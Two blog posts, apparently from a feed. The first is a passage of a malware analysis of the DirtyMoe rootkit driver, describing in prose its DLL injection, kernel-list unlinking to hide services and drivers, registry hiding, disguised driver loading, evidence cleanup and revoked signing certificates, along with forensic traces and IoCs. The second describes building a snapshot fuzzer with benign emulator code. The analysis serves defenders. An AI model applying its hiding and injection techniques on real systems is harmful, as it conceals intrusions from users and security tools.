The malicious code for x64 is simple. Firstly, it recovers the original instruction of the rewritten NtTestAlert() code. Secondly, the code invokes the found LdrLoadDll() method and loads appropriate DLL into the address space of the injected process. Finally, the code executes the return instruction and jumps back to the original NtTestAlert() function.

The x86 OS version abuses the entry point of the injected process directly. The procedure is very similar to the x64 injection, and the x86 malicious code is also identical to the x64 version. However, the x86 malicious code needs to find a 32bit variant of the  LdrLoadDll() method. It uses the similar technique described above (NtTestAlert and LdrLoadDll Lookup).

2.8 Service Hiding

Windows uses the Services Control Manager (SCM) to manage the system services. The executable of SCM is services.exe. This program runs at the system startup and performs several functions, such as running, ending, and interacting with system services. The SCM process also keeps all run services in an undocumented service record (SERVICE_RECORD) structure.

The driver must patch the service record to hide a required service. Firstly, the driver must find the process services.exe and attach it to this one via KeStackAttachProcess(). The malware author defined a byte sequence which the driver looks for in the process memory to find the service record. The services.exe keeps all run services as a linked list of SERVICE_RECORD [5]. The malware driver iterates this list and unlinks required services defined by listServices whitelist; see Table 4.

The used byte sequence for Windows 2000, XP, Vista, and Windows 7 is as follows: {45 3B E5 74 40 48 8D 0D}. There is another byte sequence {48 83 3D ?? ?? ?? ?? ?? 48 8D 0D} that is never used because it is bound to the Windows version that the malware driver has never identified; maybe in development.

The hidden services cannot be detected using PowerShell command Get-Service, Windows Task Manager, Process Explorer, etc. However, started services are logged via Windows Event Log. Therefore, we can enumerate all regular services and all logged services. Then, we can create differences to find hidden services.

2.9 Driver Hiding

The driver is able to hide itself or another malicious driver based on the IOCTL from the user-mode. The Driver Entry is initiated by a parameter representing a driver object (DRIVER_OBJECT) of the loaded driver image. The driver object contains an officially undocumented item called a driver section. The LDR_DATA_TABLE_ENTRY kernel structure stores information about the loaded driver, such as base/entry point address, image name, image size, etc. The driver section points to LDR_DATA_TABLE_ENTRY as a double-linked list representing all loaded drivers in the system.

When a user-mode application lists all loaded drivers, the kernel enumerates the double-linked list of the LDR_DATA_TABLE_ENTRY structure. The malware driver iterates the whole list and unlinks items (drivers) that should be hidden. Therefore, the kernel loses pointers to the hidden drivers and cannot enumerate all loaded drivers [6].

2.10 Driver Unload

The Driver Unload function contains suspicious code, but it seems to be never used in this version. The rest of the unload functionality executes standard procedure to unload the driver from the system.

3. Loading Driver During Boot

The DirtyMoe service loads the malicious driver. A driver image is not permanently stored on a disk since the service always extracts, loads, and deletes the driver images on the service startup. The secondary service aim is to eliminate evidence about driver loading and eventually complicate a forensic analysis. The service aspires to camouflage registry and disk activity. The DirtyMoe service is registered as follows:

Service name: Ms<volume_id>App; e.g., MsE3947328App
Registry key: HKLM\SYSTEM\CurrentControlSet\services\<service_name>
ImagePath: %SystemRoot%\system32\svchost.exe -k netsvcs
ServiceDll: C:\Windows\System32\<service_name>.dll, ServiceMain
ServiceType: SERVICE_WIN32_SHARE_PROCESS
ServiceStart: SERVICE_AUTO_START

3.1 Registry Operation

On startup, the service creates a registry record, describing the malicious driver to load; see following example:

Registry key: HKLM\SYSTEM\CurrentControlSet\services\dump_E3947328
ImagePath: \??\C:\Windows\System32\drivers\dump_LSI_FC.sys
DisplayName: dump_E3947328

At first glance, it is evident that ImagePath does not reflect DisplayName, which is the Windows common naming convention. Moreover, ImagePath prefixed with dump_ string is used for virtual drivers (loaded only in memory) managing the memory dump during the Windows crash. The malware tries to use the virtual driver name convention not to be so conspicuous. The principle of the Dump Memory using the virtual drivers is described in [7, 8].

ImagePath values are different from each windows reboot, but it always abuses the name of the system native driver; see a few instances collected during windows boot: dump_ACPI.sys, dump_RASPPPOE.sys, dump_LSI_FC.sys, dump_USBPRINT.sys, dump_VOLMGR.sys, dump_INTELPPM.sys, dump_PARTMGR.sys

3.2 Driver Loading

When the registry entry is ready, the DirtyMoe service dumps the driver into the file defined by ImagePath. Then, the service loads the driver via ZwLoadDriver().

3.3 Evidence Cleanup

When the driver is loaded either successfully or unsuccessfully, the DirtyMoe service starts to mask various malicious components to protect the whole malware hierarchy.

The DirtyMoe service removes the registry key representing the loaded driver; see Registry Operation. Further, the loaded driver hides the malware services, as the Service Hiding section describes. Registry entries related to the driver are removed via the API call. Therefore, a forensics track can be found in the SYSTEM registry HIVE, located in %SystemRoot%\system32\config\SYSTEM. The API call just removes a relevant HIVE pointer, but unreferenced data is still present in the HIVE stored on the disk. Hence, we can read removed registry entries via RegistryExplorer.

The loaded driver also removes the dumped (dump_ prefix) driver file. We were not able to restore this file via tools enabling recovery of deleted files, but it was extracted directly from the service DLL file.

Capturing driver image and register keys

The malware service is responsible for the driver loading and cleans up of loading evidence. We put a breakpoint into the nt!IopLoadDriver() kernel method, which is reached if a process wants to load a driver into the system. We waited for the wanted driver, and then we listed all the system processes. The corresponding service (svchost.exe) has a call stack that contains the kernel call for driver loading, but the corresponding service has been killed by EIP registry modifying. The process (service) was killed, and the whole Windows ended in BSoD. Windows made a crash dump, so the file system caches have been flushed, and the malicious service did not finish the cleanup in time. Therefore, we were able to mount a volume and read all wanted data.

3.4 Forensic Traces

Although the DirtyMoe service takes great pains to cover up the malicious activities, there are a few aspects that help identify the malware.

The DirtyMoe service and loaded driver itself are hidden; however, the Windows Event Log system records information about started services. Therefore, we can get additional information such as ProcessID and ThreadID of all services, including the hidden services.

WinDbg connected to the Windows kernel can display all loaded modules using the lm command. The module list can uncover non-virtual drivers with prefix dump_ and identify the malicious drivers.

Offline connected volume can provide the DLL library of the services and other supporting files, which are unfortunately encrypted and obfuscated with VMProtect. Finally, the offline SYSTEM registry stores records of the DirtyMoe service.

4. Certificates

Windows Vista and later versions of Windows require that loaded drivers must be code-signed. The digital code-signature should verify the identity and integrity of the driver vendor [9]. However, Windows does not check the current status of all certificates signing a Windows driver. So, if one of the certificates in the path is expired or revoked, the driver is still loaded into the system. We will not discuss why Windows loads drivers with invalid certificates since this topic is really wide. The backward compatibility but also a potential impact on the kernel implementation play a role.

DirtyMoe drivers are signed with three certificates as follow:

Beijing Kate Zhanhong Technology Co.,Ltd.
Valid From: 28-Nov-2013 (2:00:00)
Valid To: 29-Nov-2014 (1:59:59)
SN: 3C5883BD1DBCD582AD41C8778E4F56D9
Thumbprint: 02A8DC8B4AEAD80E77B333D61E35B40FBBB010A0
Revocation Status: Revoked on 22-May-‎2014 (9:28:59)

Beijing Founder Apabi Technology Limited
Valid From: 22-May-2018 (2:00:00)
Valid To: 29-May-2019 (14:00:00)
SN: 06B7AA2C37C0876CCB0378D895D71041
Thumbprint: 8564928AA4FBC4BBECF65B402503B2BE3DC60D4D
Revocation Status: Revoked on 22-May-‎2018 (2:00:01)

Shanghai Yulian Software Technology Co., Ltd. (上海域联软件技术有限公司)
Valid From: 23-Mar-2011 (2:00:00)
Valid To: 23-Mar-2012 (1:59:59)
SN: 5F78149EB4F75EB17404A8143AAEAED7
Thumbprint: 31E5380E1E0E1DD841F0C1741B38556B252E6231
Revocation Status: Revoked on 18-Apr-‎2011 (10:42:04)

The certificates have been revoked by their certification authorities, and they are registered as stolen, leaked, misuse, etc. [10]. Although all certificates have been revoked in the past, Windows loads these drivers successfully because the root certificate authorities are marked as trusted.

5. Summarization and Discussion

We summarize the main functionality of the DirtyMoe driver. We discuss the quality of the driver implementation, anti-forensic mechanisms, and stolen certificates for successful driver loading.

5.1 Main Functionality

Authorization

The driver is controlled via IOCTL codes which are sent by malware processes in the user-mode. However, the driver implements the authorization instrument, which verifies that the IOCTLs are sent by authenticated processes. Therefore, not all processes can communicate with the driver.

Affecting the Filesystem

If a rootkit is in the kernel, it can do “anything”. The DirtyMoe driver registers itself in the filter manager and begins to influence the results of filesystem I/O operations; in fact, it begins to filter the content of the filesystem. Furthermore, the driver replaces the NtfsCreatCallback() callback function of the NTFS driver, so the driver can determine who should gain access and what should not get to the filesystem.

Thread Monitoring and Code injection

The DirtyMoe driver enrolls a malicious routine which is invoked if the system creates a new thread. The malicious routine abuses the APC kernel mechanism to execute the malicious code. It loads arbitrary DLL into the new thread. 

Registry Hiding

This technique abuses the kernel hook method that indexes registry keys in HIVE. The code execution of the hook method is redirected to the malicious routine so that the driver can control the indexing of registry keys. Actually, the driver can select which keys will be indexed or not.

Service and Driver Hiding

Patching of specific kernel structures causes that certain API functions do not enumerate all system services or loaded drivers. Windows services and drivers are stored as a double-linked list in the kernel. The driver corrupts the kernel structures so that malicious services and drivers are unlinked from these structures. Consequently, if the kernel iterates these structures for the purpose of enumeration, the malicious items are skipped.

5.2 Anti-Forensic Technique

As we mentioned above, the driver is able to hide itself. But before driver loading, the DirtyMoe service must register the driver in the registry and dump the driver into the file. When the driver is loaded, the DirtyMoe service deletes all registry entries related to the driver loading. The driver deletes its own file from the file system through the kernel-mode. Therefore, the driver is loaded in the memory, but its file is gone.

The DirtyMoe service removes the registry entries via standard API calls. We can restore this data from the physical storage since the API calls only remove the pointer from HIVE. The dumped driver file is never physically stored on the disk drive because its size is too small and is present only in cache memory. Accordingly, the file is removed from the cache before cache flushing to the disk, so we cannot restore the file from the physical disk.

5.3 Discussion

The whole driver serves as an all-in-one super rootkit package. Any malware can register itself in the driver if knowing the authorization code. After successful registration, the malware can use a wide range of driver functionality. Hypothetically, the authorization code is hardcoded, and the driver’s name can be derived so we can communicate with the driver and stop it.

The system loads the driver via the DirtyMoe service within a few seconds. Moreover, the driver file is never present in the file system physically, only in the cache. The driver is loaded via the API call, and the DirtyMoe service keeps a handler of the driver file, so the file manipulation with the driver file is limited. However, the driver removes its own file using kernel-call. Therefore, the driver file is removed from the file system cache, and the driver handler is still relevant, with the difference that the driver file does not exist, including its forensic traces.

The DirtyMoe malware is written using Delphi in most cases. Naturally, the driver is coded in native C. The code style of the driver and the rest of the malware is very different. We analyzed that most of the driver functionalities are downloaded from internet forums as public samples. Each implementation part of the driver is also written in a different style. The malware authors have merged individual rootkit functionality into one kit. They also merged known bugs, so the driver shows a few significant symptoms of driver presence in the system. The authors needed to adapt the functionality of the public samples to their purpose, but that has been done in a very dilettante way. It seems that the malware authors are familiar only with Delphi.

Finally, the code-signature certificates that are used have been revoked in the middle of their validity period. However, the certificates are still widely used for code signing, so the private keys of the certificates have probably been stolen or leaked. In addition, the stolen certificates have been signed by the certification authority which Microsoft trusts, so the certificates signed in this way can be successfully loaded into the system despite their revocation. Moreover, the trend in the use of certificates is growing, and predictions show that it will continue to grow in the future. We will analyze the problems of the code-signature certificates in the future post.

6. Conclusion

DirtyMoe driver is an advanced piece of rootkit that DirtyMoe uses to effectively hide malicious activity on host systems. This research was undertaken to inspect the rootkit functionally of the DirtyMoe driver and evaluate the impact on infected systems. This study set out to investigate and present the analysis of the DirtyMoe driver, namely its functionality, the ability to conceal, deployment, and code-signature.

The research has shown that the driver provides key functionalities to hide malicious processes, services, and registry keys. Another dangerous action of the driver is the injection of malicious code into newly created processes. Moreover, the driver also implements the minifilter, which monitors and affects I/O operations on the file system. Therefore, the content of the file system is filtered, and appropriate files/directories can be hidden for users. An implication of this finding is that malware itself and its artifacts are hidden even for AVs. More importantly, the driver implements another anti-forensic technique which removes the driver’s evidence from disk and registry immediately after driver loading. However, a few traces can be found on the victim’s machines.

This study has provided the first comprehensive review of the driver that protects and serves each malware service and process of the DirtyMoe malware. The scope of this study was limited in terms of driver functionality. However, further experimental investigations are needed to hunt out and investigate other samples that have been signed by the revoked certificates. Because of this, the malware author can be traced and identified using thus abused certificates.

IoCs

Samples (SHA-256)
550F8D092AFCD1D08AC63D9BEE9E7400E5C174B9C64D551A2AD19AD19C0126B1
AABA7DB353EB9400E3471EAAA1CF0105F6D1FAB0CE63F1A2665C8BA0E8963A05
B3B5FFF57040C801A4392DA2AF83F4BF6200C575AA4A64AB9A135B58AA516080
CB95EF8809A89056968B669E038BA84F708DF26ADD18CE4F5F31A5C9338188F9
EB29EDD6211836E6D1877A1658E648BEB749091CE7D459DBD82DC57C84BC52B1

References

[1] Kernel-Mode Driver Architecture
[2] Driver to Hide Processes and Files
[3] A piece of code to hide registry entries
[4] Hidden
[5] Opening Hacker’s Door
[6] Hiding loaded driver with DKOM
[7] Crashdmp-ster Diving the Windows 8 Crash Dump Stack
[8] Ghost drivers named dump_*.sys
[9] Driver Signing
[10] Australian web hosts hit with a Manic Menagerie of malware

Appendix A

Registry entries used in the Start Routine

\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceAddress
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceNumber
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceId
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceName
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceNameB
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceNameOnly
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverMaker1
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverMaker1_2
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverMaker2
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverMaker2_2
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDevicePathA
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDevicePathB
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverPath1
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverPath1_2
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverPath2
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverPath2_2
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceDataA
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceDataB
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverDataA
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverDataA_2
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverDataB
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverDataB_2


Appendix B

Example of registry entries configuring the driver

Key: ControlSet001\Control\WinApi
Value: WinDeviceAddress
Data: Ms312B9050App;   

Value: WinDeviceNumber
Data:
\WINDOWS\AppPatch\Ke601169.xsl;
\WINDOWS\AppPatch\Ke237043.xsl;
\WINDOWS\AppPatch\Ke311799.xsl;
\WINDOWS\AppPatch\Ke119163.xsl;
\WINDOWS\AppPatch\Ke531580.xsl;
\WINDOWS\AppPatch\Ke856583.xsl;
\WINDOWS\AppPatch\Ke999860.xsl;
\WINDOWS\AppPatch\Ke410472.xsl;
\WINDOWS\AppPatch\Ke673389.xsl;
\WINDOWS\AppPatch\Ke687417.xsl;
\WINDOWS\AppPatch\Ke689468.xsl;
\WINDOWS\AppPatch\Ac312B9050.sdb;
\WINDOWS\System32\Ms312B9050App.dll;

Value: WinDeviceName
Data:
C:\WINDOWS\AppPatch\Ac312B9050.sdb;
C:\WINDOWS\System32\Ms312B9050App.dll;

Value: WinDeviceId
Data: dump_FDC.sys;

The post DirtyMoe: Rootkit Driver appeared first on Avast Threat Labs.

Building a new snapshot fuzzer & fuzzing IDA

Introduction

It is January 2020 and it is this time of the year where I try to set goals for myself. I had just come back from spending Christmas with my family in France and felt fairly recharged. It always is an exciting time for me to think and plan for the year ahead; who knows maybe it'll be the year where I get good at computers I thought (spoiler alert: it wasn't).

One thing I had in the back of my mind was to develop my own custom fuzzing tooling. It was the perfect occasion to play with technologies like Windows Hypervisor platform APIs, KVM APIs but also try out what recent versions of C++ had in store. After talking with yrp604, he convinced me to write a tool that could be used to fuzz any Windows targets, user or kernel, application or service, kernel or drivers. He had done some work in this area so he could follow me along and help me out when I ran into problems.

Great, the plan was to develop this Windows snapshot-based fuzzer running the target code into some kind of environment like a VM or an emulator. It would allow the user to instrument the target the way they wanted via breakpoints and would provide basic features that you expect from a modern fuzzer: code coverage, crash detection, general mutator, cross-platform support, fast restore, etc.

Writing a tool is cool but writing a useful tool is even cooler. That's why I needed to come up with a target I could try the fuzzer against while developing it. I thought that IDA would make a good target for several reasons:

  1. It is a complex Windows user-mode application,
  2. It parses a bunch of binary files,
  3. The application is heavy and is slow to start. The snapshot approach could help fuzz it faster than traditionally,
  4. It has a bug bounty.

In this blog post, I will walk you through the birth of what the fuzz, its history, and my overall journey from zero to accomplishing my initial goals. For those that want the results before reading, you can find my findings in this Github repository: fuzzing-ida75.

There is also an excellent blog post that my good friend Markus authored on RET2 Systems' blog documenting how he used wtf to find exploitable memory corruption in a triple-A game: Fuzzing Modern UDP Game Protocols With Snapshot-based Fuzzers.

Architecture

At this point I had a pretty good idea of what the final product should look like and how a user would use wtf:

  1. The user finds a spot in the target that is close to consuming attacker-controlled data. The Windows kernel debugger is used to break at this location and put the target into the wanted state. When done, the user generates a kernel-crash dump and extracts the CPU state.
  2. The user writes a module to tell wtf how to insert a test case in the target. wtf provides basic features like reading physical and virtual memory ranges, read and write registers, etc. The user also defines exit conditions to tell the fuzzer when to stop executing test cases.
  3. wtf runs the targeted code, tracks code coverage, detects crashes, and tracks dirty memory.
  4. wtf restores the dirty physical memory from the kernel crash dump and resets the CPU state. It generates a new test case, rinse & repeat.

After laying out the plan, I realized that I didn't have code that parsed Windows kernel-crash dump which is essential for wtf. So I wrote kdmp-parser which is a C++ library that parses Windows kernel crash dumps. I wrote it myself because I couldn't find a simple drop-in library available on the shelf. Getting physical memory is not enough because I also needed to dump the CPU state as well as MSRs, etc. Thankfully yrp604 had already hacked up a Windbg Javascript extension to do the work and so I reused it bdump.js.

Once I was able to extract the physical memory & the CPU state I needed an execution environment to run my target. Again, yrp604 was working on bochscpu at the time and so I started there. bochscpu is basically bochs's CPU available from a Rust library with C bindings (yes he kindly made bindings because I didn't want to touch any Rust). It basically is a software CPU that knows how to run intel 64-bit code, knows about segmentation, rings, MSRs, etc. It also doesn't use any of bochs devices so it is much lighter. From the start, I decided that wtf wouldn't handle any devices: no disk, no screen, no mouse, no keyboards, etc.

Bochscpu 101

The first step was to load up the physical memory and configure the CPU of the execution environment. Memory in bochscpu is lazy: you start execution with no physical memory available and bochs invokes a callback of yours to tell you when the guest is accessing physical memory that hasn't been mapped. This is great because:

  1. No need to load an entire dump of memory inside the emulator when it starts,
  2. Only used memory gets mapped making the instance very light in memory usage.

I also need to introduce a few acronyms that I use everywhere:

  1. GPA: Guest physical address. This is a physical address inside the guest. The guest is what is run inside the emulator.
  2. GVA: Guest virtual address. This is guest virtual memory.
  3. HVA: Host virtual address. This is virtual memory inside the host. The host is what runs the execution environment.

To register the callback you need to invoke bochscpu_mem_missing_page. The callback receives the GPA that is being accessed and you can call bochscpu_mem_page_insert to insert an HVA page that backs a GPA into the environment. Yes, all guest physical memory is backed by regular virtual memory that the host allocates. Here is a simple example of what the wtf callback looks like:

void StaticGpaMissingHandler(const uint64_t Gpa) {
  const Gpa_t AlignedGpa = Gpa_t(Gpa).Align();
  BochsHooksDebugPrint("GpaMissingHandler: Mapping GPA {:#x} ({:#x}) ..\n",
                       AlignedGpa, Gpa);

  const void *DmpPage =
      reinterpret_cast<BochscpuBackend_t *>(g_Backend)->GetPhysicalPage(
          AlignedGpa);
  if (DmpPage == nullptr) {
    BochsHooksDebugPrint(
        "GpaMissingHandler: GPA {:#x} is not mapped in the dump.\n",
        AlignedGpa);
  }

  uint8_t *Page = (uint8_t *)aligned_alloc(Page::Size, Page::Size);
  if (Page == nullptr) {
    fmt::print("Failed to allocate memory in GpaMissingHandler.\n");
    __debugbreak();
  }

  if (DmpPage) {

    //
    // Copy the dump page into the new page.
    //

    memcpy(Page, DmpPage, Page::Size);

  } else {

    //
    // Fake it 'till you make it.
    //

    memset(Page, 0, Page::Size);
  }

  //
  // Tell bochscpu that we inserted a page backing the requested GPA.
  //

  bochscpu_mem_page_insert(AlignedGpa.U64(), Page);
}

It is simple:

  1. we allocate a page of memory with aligned_alloc as bochs requires page-aligned memory,
  2. we populate its content using the crash dump.
  3. we assume that if the guest accesses physical memory that isn't in the crash dump, it means that the OS is allocating "new" memory. We fill those pages with zeroes. We also assume that if we are wrong about that, the guest will crash in spectacular ways.

To create a context, you call bochscpu_cpu_new to create a virtual CPU and then bochscpu_cpu_set_state to set its state. This is a shortened version of LoadState:

void BochscpuBackend_t::LoadState(const CpuState_t &State) {
  bochscpu_cpu_state_t Bochs;
  memset(&Bochs, 0, sizeof(Bochs));

  Seed_ = State.Seed;
  Bochs.bochscpu_seed = State.Seed;
  Bochs.rax = State.Rax;
  Bochs.rbx = State.Rbx;
//...
  Bochs.rflags = State.Rflags;
  Bochs.tsc = State.Tsc;
  Bochs.apic_base = State.ApicBase;
  Bochs.sysenter_cs = State.SysenterCs;
  Bochs.sysenter_esp = State.SysenterEsp;
  Bochs.sysenter_eip = State.SysenterEip;
  Bochs.pat = State.Pat;
  Bochs.efer = uint32_t(State.Efer.Flags);
  Bochs.star = State.Star;
  Bochs.lstar = State.Lstar;
  Bochs.cstar = State.Cstar;
  Bochs.sfmask = State.Sfmask;
  Bochs.kernel_gs_base = State.KernelGsBase;
  Bochs.tsc_aux = State.TscAux;
  Bochs.fpcw = State.Fpcw;
  Bochs.fpsw = State.Fpsw;
  Bochs.fptw = State.Fptw;
  Bochs.cr0 = uint32_t(State.Cr0.Flags);
  Bochs.cr2 = State.Cr2;
  Bochs.cr3 = State.Cr3;
  Bochs.cr4 = uint32_t(State.Cr4.Flags);
  Bochs.cr8 = State.Cr8;
  Bochs.xcr0 = State.Xcr0;
  Bochs.dr0 = State.Dr0;
  Bochs.dr1 = State.Dr1;
  Bochs.dr2 = State.Dr2;
  Bochs.dr3 = State.Dr3;
  Bochs.dr6 = State.Dr6;
  Bochs.dr7 = State.Dr7;
  Bochs.mxcsr = State.Mxcsr;
  Bochs.mxcsr_mask = State.MxcsrMask;
  Bochs.fpop = State.Fpop;

#define SEG(_Bochs_, _Whv_)                                                    \
  {                                                                            \
    Bochs._Bochs_.attr = State._Whv_.Attr;                                     \
    Bochs._Bochs_.base = State._Whv_.Base;                                     \
    Bochs._Bochs_.limit = State._Whv_.Limit;                                   \
    Bochs._Bochs_.present = State._Whv_.Present;                               \
    Bochs._Bochs_.selector = State._Whv_.Selector;                             \
  }

  SEG(es, Es);
  SEG(cs, Cs);
  SEG(ss, Ss);
  SEG(ds, Ds);
  SEG(fs, Fs);
  SEG(gs, Gs);
  SEG(tr, Tr);
  SEG(ldtr, Ldtr);

#undef SEG

#define GLOBALSEG(_Bochs_, _Whv_)                                              \
  {                                                                            \
    Bochs._Bochs_.base = State._Whv_.Base;                                     \
    Bochs._Bochs_.limit = State._Whv_.Limit;                                   \
  }

  GLOBALSEG(gdtr, Gdtr);
  GLOBALSEG(idtr, Idtr);

  // ...
  bochscpu_cpu_set_state(Cpu_, &Bochs);
}

In order to register various hooks, you need a chain of bochscpu_hooks_t structures. For example, wtf registers them like this:

//
// Prepare the hooks.
//

Hooks_.ctx = this;
Hooks_.after_execution = StaticAfterExecutionHook;
Hooks_.before_execution = StaticBeforeExecutionHook;
Hooks_.lin_access = StaticLinAccessHook;
Hooks_.interrupt = StaticInterruptHook;
Hooks_.exception = StaticExceptionHook;
Hooks_.phy_access = StaticPhyAccessHook;
Hooks_.tlb_cntrl = StaticTlbControlHook;

I don't want to describe every hook but we get notified every time an instruction is executed and every time physical or virtual memory is accessed. The hooks are documented in instrumentation.txt if you are curious. As an example, this is the mechanism used to provide full system code coverage:

void BochscpuBackend_t::BeforeExecutionHook(
        /*void *Context, */ uint32_t, void *) {

  //
  // Grab the rip register off the cpu.
  //

  const Gva_t Rip = Gva_t(bochscpu_cpu_rip(Cpu_));

  //
  // Keep track of new code coverage or log into the trace file.
  //

  const auto &Res = AggregatedCodeCoverage_.emplace(Rip);
  if (Res.second) {
    LastNewCoverage_.emplace(Rip);
  }

  // ...
}

Once the hook chain is configured, you start execution of the guest with bochscpu_cpu_run:

//
// Lift off.
//

bochscpu_cpu_run(Cpu_, HookChain_);

Great, we're now pros and we can run some code!

Building the basics

In this part, I focus on the various fundamental blocks that we need to develop for the fuzzer to work and be useful.

Memory access facilities

As mentioned in the introduction, the user needs to tell the fuzzer how to insert a test case into its target. As a result, the user needs to be able to read & write physical and virtual memory.

Let's start with the easy one. To write into guest physical memory we need to find the backing HVA page. bochscpu uses a dictionary to map GPA to HVA pages that we can query using bochscpu_mem_phy_translate. Keep in mind that two adjacent GPA pages are not necessarily adjacent in the host address space, that is why writing across two pages needs extra care.

Writing to virtual memory is trickier because we need to know the backing GPAs. This means emulating the MMU and parsing the page tables. This gives us GPAs and we know how to write in this space. Same as above, writing across two pages needs extra care.

Instrumenting execution flow

Being able to instrument the target is very important because both the user and wtf itself need this to implement features. For example, crash detection is implemented by wtf using breakpoints in strategic areas. Another example, the user might also need to skip a function call and fake a return value. Implementing breakpoints in an emulator is easy as we receive a notification when an instruction is executed. This is the perfect spot to check if we have a registered breakpoint at this address and invoke a callback if so:

void BochscpuBackend_t::BeforeExecutionHook(
        /*void *Context, */ uint32_t, void *) {

  //
  // Grab the rip register off the cpu.
  //

  const Gva_t Rip = Gva_t(bochscpu_cpu_rip(Cpu_));

  // ...

  //
  // Handle breakpoints.
  //

  if (Breakpoints_.contains(Rip)) {
    Breakpoints_.at(Rip)(this);
  }
}

Handling infinite loop

To protect the fuzzer against infinite loops, the AfterExecutionHook hook is used to count instructions. This allows us to limit test case execution:

void BochscpuBackend_t::AfterExecutionHook(/*void *Context, */ uint32_t,
                                           void *) {

  //
  // Keep track of the instructions executed.
  //

  RunStats_.NumberInstructionsExecuted++;

  //
  // Check the instruction limit.
  //

  if (InstructionLimit_ > 0 &&
      RunStats_.NumberInstructionsExecuted > InstructionLimit_) {

    //
    // If we're over the limit, we stop the cpu.
    //

    BochsHooksDebugPrint("Over the instruction limit ({}), stopping cpu.\n",
                         InstructionLimit_);
    TestcaseResult_ = Timedout_t();
    bochscpu_cpu_stop(Cpu_);
  }
}

Tracking code coverage

Again, getting full system code coverage with bochscpu is very easy thanks to the hook points. Every time an instruction is executed we add the address into a set:

void BochscpuBackend_t::BeforeExecutionHook(
        /*void *Context, */ uint32_t, void *) {

  //
  // Grab the rip register off the cpu.
  //

  const Gva_t Rip = Gva_t(bochscpu_cpu_rip(Cpu_));

  //
  // Keep track of new code coverage or log into the trace file.
  //

  const auto &Res = AggregatedCodeCoverage_.emplace(Rip);
  if (Res.second) {
    LastNewCoverage_.emplace(Rip);
  }

Tracking dirty memory

wtf tracks dirty memory to be able to restore state fast. Instead of restoring the entire physical memory, we simply restore the memory that has changed since the beginning of the execution. One of the hook points notifies us when the guest accesses memory, so it is easy to know which memory gets written to.

void BochscpuBackend_t::LinAccessHook(/*void *Context, */ uint32_t,
                                      uint64_t VirtualAddress,
                                      uint64_t PhysicalAddress, uintptr_t Len,
                                      uint32_t, uint32_t MemAccess) {

  // ...

  //
  // If this is not a write access, we don't care to go further.
  //

  if (MemAccess != BOCHSCPU_HOOK_MEM_WRITE &&
      MemAccess != BOCHSCPU_HOOK_MEM_RW) {
    return;
  }

  //
  // Adding the physical address the set of dirty GPAs.
  // We don't use DirtyVirtualMemoryRange here as we need to
  // do a GVA->GPA translation which is a bit costly.
  //

  DirtyGpa(Gpa_t(PhysicalAddress));
}

Note that accesses straddling pages aren't handled in this callback because bochs delivers one call per page. Once wtf knows which pages are dirty, restoring is easy:

bool BochscpuBackend_t::Restore(const CpuState_t &CpuState) {
  // ...
  //
  // Restore physical memory.
  //

  uint8_t ZeroPage[Page::Size];
  memset(ZeroPage, 0, sizeof(ZeroPage));
  for (const auto DirtyGpa : DirtyGpas_) {
    const uint8_t *Hva = DmpParser_.GetPhysicalPage(DirtyGpa.U64());

    //
    // As we allocate physical memory pages full of zeros when
    // the guest tries to access a GPA that isn't present in the dump,
    // we need to be able to restore those. It's easy, if the Hva is nullptr,
    // we point it to a zero page.
    //

    if (Hva == nullptr) {
      Hva = ZeroPage;
    }

    bochscpu_mem_phy_write(DirtyGpa.U64(), Hva, Page::Size);
  }

  //
  // Empty the set.
  //

  DirtyGpas_.clear();

  // ...
  return true;
}

Generic mutators

I think generic mutators are great but I didn't want to spend too much time worrying about them. Ultimately I think you get more value out of writing a domain-specific generator and building a diverse high-quality corpus. So I simply ripped off libfuzzer's and honggfuzz's.

class LibfuzzerMutator_t {
  using CustomMutatorFunc_t =
      decltype(fuzzer::ExternalFunctions::LLVMFuzzerCustomMutator);
  fuzzer::Random Rand_;
  fuzzer::MutationDispatcher Mut_;
  std::unique_ptr<fuzzer::Unit> CrossOverWith_;

public:
  explicit LibfuzzerMutator_t(std::mt19937_64 &Rng);

  size_t Mutate(uint8_t *Data, const size_t DataLen, const size_t MaxSize);
  void RegisterCustomMutator(const CustomMutatorFunc_t F);
  void SetCrossOverWith(const Testcase_t &Testcase);
};

class HonggfuzzMutator_t {
  honggfuzz::dynfile_t DynFile_;
  honggfuzz::honggfuzz_t Global_;
  std::mt19937_64 &Rng_;
  honggfuzz::run_t Run_;

public:
  explicit HonggfuzzMutator_t(std::mt19937_64 &Rng);
  size_t Mutate(uint8_t *Data, const size_t DataLen, const size_t MaxSize);
  void SetCrossOverWith(const Testcase_t &Testcase);
};

Corpus store

Code coverage in wtf is basically the fitness function. Every test case that generates new code coverage is added to the corpus. The code that keeps track of the corpus is basically a glorified list of test cases that are kept in memory.

